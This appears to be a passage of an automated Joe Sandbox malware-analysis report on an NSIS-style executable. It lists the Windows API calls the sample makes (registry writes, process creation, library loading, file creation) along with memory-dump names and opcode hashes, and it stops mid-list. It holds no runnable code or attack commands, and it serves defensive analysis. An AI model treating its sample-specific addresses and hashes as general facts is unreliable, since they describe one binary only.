                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Timeout
                                                                • String ID: !
                                                                • API String ID: 1777923405-2657877971
                                                                • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                                • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 675 402476-4024a7 call 402bce * 2 call 402c5e 682 402a5a-402a69 675->682 683 4024ad-4024b7 675->683 685 4024c7-4024ca 683->685 686 4024b9-4024c6 call 402bce lstrlenA 683->686 689 4024e1-4024e4 685->689 690 4024cc-4024e0 call 402bac 685->690 686->685 691 4024f5-402509 RegSetValueExA 689->691 692 4024e6-4024f0 call 4030d8 689->692 690->689 696 40250b 691->696 697 40250e-4025eb RegCloseKey 691->697 692->691 696->697 697->682
                                                                APIs
                                                                • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsa617D.tmp,00000023,00000011,00000002), ref: 004024C1
                                                                • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsa617D.tmp,00000000,00000011,00000002), ref: 00402501
                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsa617D.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CloseValuelstrlen
                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsa617D.tmp
                                                                • API String ID: 2655323295-2354568871
                                                                • Opcode ID: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                                • Instruction ID: f8068cdfa95035626473adca5f51816a5c1db3e2bbb00f719c7efdf62c59a762
                                                                • Opcode Fuzzy Hash: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                                • Instruction Fuzzy Hash: 12118171E00218AFEF10AFA59E89EAE7A74EB44314F20443BF505F71D1D6B99D419B28
                                                                APIs
                                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                  • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                  • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                  • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,771B23A0), ref: 0040527A
                                                                  • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                  • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                  • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                  • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                • String ID:
                                                                • API String ID: 2987980305-0
                                                                • Opcode ID: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                                • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                                • Opcode Fuzzy Hash: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                                • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                                APIs
                                                                  • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                  • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                  • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                  • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405727
                                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,000000F0), ref: 0040163C
                                                                Strings
                                                                • C:\Users\user\tranchet\Trykmaalere, xrefs: 00401631
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                • String ID: C:\Users\user\tranchet\Trykmaalere
                                                                • API String ID: 1892508949-2000945231
                                                                • Opcode ID: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                                • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                                • Opcode Fuzzy Hash: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                                • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                                APIs
                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,0042A070,?,?,?,00000002,Call,?,00406293,80000002), ref: 00406024
                                                                • RegCloseKey.KERNELBASE(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A070), ref: 0040602F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CloseQueryValue
                                                                • String ID: Call
                                                                • API String ID: 3356406503-1824292864
                                                                • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                                • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                • CloseHandle.KERNEL32(?), ref: 004057CC
                                                                Strings
                                                                • Error launching installer, xrefs: 004057A9
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateHandleProcess
                                                                • String ID: Error launching installer
                                                                • API String ID: 3712363035-66219284
                                                                • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                                • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                                APIs
                                                                • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                                • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsa617D.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Enum$CloseValue
                                                                • String ID:
                                                                • API String ID: 397863658-0
                                                                • Opcode ID: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                                • Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
                                                                • Opcode Fuzzy Hash: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                                • Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629
                                                                APIs
                                                                • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsa617D.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CloseQueryValue
                                                                • String ID:
                                                                • API String ID: 3356406503-0
                                                                • Opcode ID: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                                • Instruction ID: 101e8c123746c764c526cee79e76b60048690b918ccacca24166b7bb3c1ff757
                                                                • Opcode Fuzzy Hash: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                                • Instruction Fuzzy Hash: EA11C171A00205EFDF25DF64CE985AE7AB4EF00355F20843FE446B72C0D6B88A86DB19
                                                                APIs
                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                                • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                                APIs
                                                                • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040244B
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CloseDeleteValue
                                                                • String ID:
                                                                • API String ID: 2831762973-0
                                                                • Opcode ID: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                                • Instruction ID: 28034f9d49707e31730e5ee4ae5769526bd8744af0d0927f07882998c216e066
                                                                • Opcode Fuzzy Hash: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                                • Instruction Fuzzy Hash: E3F09632600121DBE720BFA49B8EAAE72A59B40314F25453FF602B71C1D9F84E4246AE
                                                                APIs
                                                                • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                                • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: EnvironmentExpandStringslstrcmp
                                                                • String ID:
                                                                • API String ID: 1938659011-0
                                                                • Opcode ID: ce4306d2a07f27be9225dd95e0d9a06ea23b17b85f17c9412fffb0a9b71968b5
                                                                • Instruction ID: c1865f8cc46f1228928c2992524d711605dd36016a3aefe194dc66e9efe750da
                                                                • Opcode Fuzzy Hash: ce4306d2a07f27be9225dd95e0d9a06ea23b17b85f17c9412fffb0a9b71968b5
                                                                • Instruction Fuzzy Hash: 24F08231705201DBCB20DF769D04A9BBFA4EF91354B10803BE145F6190D6788502CA68
                                                                APIs
                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Window$EnableShow
                                                                • String ID:
                                                                • API String ID: 1136574915-0
                                                                • Opcode ID: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                                • Instruction ID: 2686c2d45ba130581374544c13beebfcaf73fd10f5aa92b185336ae358fe78f7
                                                                • Opcode Fuzzy Hash: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                                • Instruction Fuzzy Hash: 69E09232B04200EFD714EFA5EA8856E7BB0EB40325B20413FF001F20C1DAB848418A69
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                  • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                  • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                                  • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                • String ID:
                                                                • API String ID: 2547128583-0
                                                                • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                                • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                                APIs
                                                                • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405C94
                                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
